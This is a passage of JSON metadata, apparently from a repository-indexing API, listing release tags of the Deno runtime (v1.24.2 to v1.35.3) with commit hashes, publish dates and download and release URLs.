manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind